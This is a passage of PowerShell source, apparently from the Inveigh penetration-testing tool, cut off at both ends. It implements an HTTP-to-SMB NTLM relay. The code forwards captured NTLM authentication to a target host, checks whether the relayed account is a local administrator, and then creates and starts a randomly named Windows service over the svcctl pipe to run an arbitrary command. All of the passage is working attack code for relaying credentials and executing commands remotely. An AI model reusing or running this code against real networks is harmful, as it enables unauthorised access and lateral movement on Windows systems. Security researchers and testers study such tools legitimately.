[Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68) $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $packet_referent_ID1 += 0x00,0x00 $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $packet_referent_ID2 += 0x00,0x00 $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf)) $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00)) return $packet_SCMOpenSCManagerW } function Get-PacketSCMCreateServiceW() { param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length, [Byte[]]$packet_command,[Byte[]]$packet_command_length) $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $packet_referent_ID += 0x00,0x00 $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x02,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00)) return $packet_SCMCreateServiceW } function Get-PacketSCMStartServiceW() { param([Byte[]]$packet_context_handle) $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle) $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) return $packet_SCMStartServiceW } function Get-PacketSCMDeleteServiceW() { param([Byte[]]$packet_context_handle) $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle) return $packet_SCMDeleteServiceW } function Get-PacketSCMCloseServiceHandle() { param([Byte[]]$packet_context_handle) $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle) return $packet_SCM_CloseServiceW } } # SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response $SMB_NTLM_functions_scriptblock = { function SMBNTLMChallenge { param ([Byte[]]$payload_bytes) $payload = [System.BitConverter]::ToString($payload_bytes) $payload = $payload -replace "-","" $NTLM_index = $payload.IndexOf("4E544C4D53535000") if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") { $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) } return $NTLM_challenge } } # SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target $SMB_relay_challenge_scriptblock = { function SMBRelayChallenge { param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version) if($SMB_relay_socket) { $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream() } $SMB_client_receive = New-Object System.Byte[] 1024 $SMB_client_stage = 'NegotiateSMB' :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit') { switch ($SMB_client_stage) { 'NegotiateSMB' { $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_relay_challenge_stream.Flush() $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42') { $SMB_version = 'SMB1' $SMB_client_stage = 'NTLMSSPNegotiate' } else { $SMB_client_stage = 'NegotiateSMB2' } if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')) { $inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")]) $SMB_relay_socket.Close() $SMB_client_receive = $null $inveigh.SMB_relay = $false $SMB_client_stage = 'exit' } } 'NegotiateSMB2' { $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 $packet_SMB2_header = Get-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = Get-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_relay_challenge_stream.Flush() $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'NTLMSSPNegotiate' } 'NTLMSSPNegotiate' { if($SMB_version -eq 'SMB1') { $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } else { $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data } $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_relay_challenge_stream.Flush() $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'exit' } } } return $SMB_client_receive } } # SMB Relay Response ScriptBlock - sends NTLM reponse to relay target $SMB_relay_response_scriptblock = { function SMBRelayResponse { param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID) $SMB_client_receive = New-Object System.Byte[] 1024 if($SMB_relay_socket) { $SMB_relay_response_stream = $SMB_relay_socket.GetStream() } if($SMB_version -eq 'SMB1') { $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID $packet_SMB_header["SMBHeader_UserID"] = $SMB_user_ID $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } else { $SMB2_message_ID = 3 $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_auth $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data } $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_relay_response_stream.Flush() $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')) { $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")]) } else { $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")]) $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target") $SMB_relay_failed = $true $SMB_relay_socket.Close() } if(!$SMB_relay_failed) { if(!$Service) { $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)})) $SMB_service = $SMB_service_random -replace "-00","" $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1) $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length) $SMB_service_random += '00-00-00-00-00' $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else { $SMB_service = $Service $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service) if([Bool]($SMB_service.Length % 2)) { $SMB_service_bytes += 0x00,0x00 } else { $SMB_service_bytes += 0x00,0x00,0x00,0x00 } } $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1) $Command = "%COMSPEC% /C `"" + $Command + "`"" [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$PsExec_command += "{0:X2}-00-" -f $_} if([Bool]($Command.Length % 2)) { $PsExec_command += '00-00' } else { $PsExec_command += '00-00-00-00' } $PsExec_command_bytes = $PsExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $PsExec_command_length_bytes = [System.BitConverter]::GetBytes($PsExec_command_bytes.Length / 2) $SMB_path = "\\" + $Target + "\IPC$" if($SMB_version -eq 'SMB1') { $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00 } else { $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path) } $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03 $SMB_client_stream = $SMB_relay_socket.GetStream() $SMB_split_index = 4256 if($SMB_version -eq 'SMB1') { $SMB_client_stage = 'TreeConnectAndXRequest' :SMB_execute_loop while ($SMB_client_stage -ne 'Exit') { switch ($SMB_client_stage) { 'TreeConnectAndXRequest' { $packet_SMB_header = Get-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBTreeConnectAndXRequest $SMB_path_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'CreateAndXRequest' } 'CreateAndXRequest' { $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl $SMB_tree_ID = $SMB_client_receive[28,29] $packet_SMB_header = Get-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'RPCBind' } 'RPCBind' { $SMB_FID = $SMB_client_receive[42,43] $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'OpenSCManagerW' } 'ReadAndXRequest' { Start-Sleep -m 150 $packet_SMB_header = Get-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBReadAndXRequest $packet_SMB_data["SMBReadAndXRequest_FID"] = $SMB_FID $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = $SMB_client_stage_next } 'OpenSCManagerW' { $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length) $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'CheckAccess' } 'CheckAccess' { if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")]) $SMB_service_manager_context_handle = $SMB_client_receive[88..107] $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data if($SCM_data.Length -lt $SMB_split_index) { $SMB_client_stage = 'CreateServiceW' } else { $SMB_client_stage = 'CreateServiceW_First' } } elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) $SMB_relay_failed = $true } else { $SMB_relay_failed = $true } } 'CreateServiceW' { $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $SCM_data.Length $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'StartServiceW' } 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) $SMB_split_index_tracker = $SMB_split_index $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if($SMB_split_stage_final -le 2) { $SMB_client_stage = 'CreateServiceW_Last' } else { $SMB_split_stage = 2 $SMB_client_stage = 'CreateServiceW_Middle' } } 'CreateServiceW_Middle' { $SMB_split_stage++ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)] $SMB_split_index_tracker += $SMB_split_index $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index) $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if($SMB_split_stage -ge $SMB_split_stage_final) { $SMB_client_stage = 'CreateServiceW_Last' } else { $SMB_client_stage = 'CreateServiceW_Middle' } } 'CreateServiceW_Last' { $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SCM_data_last = 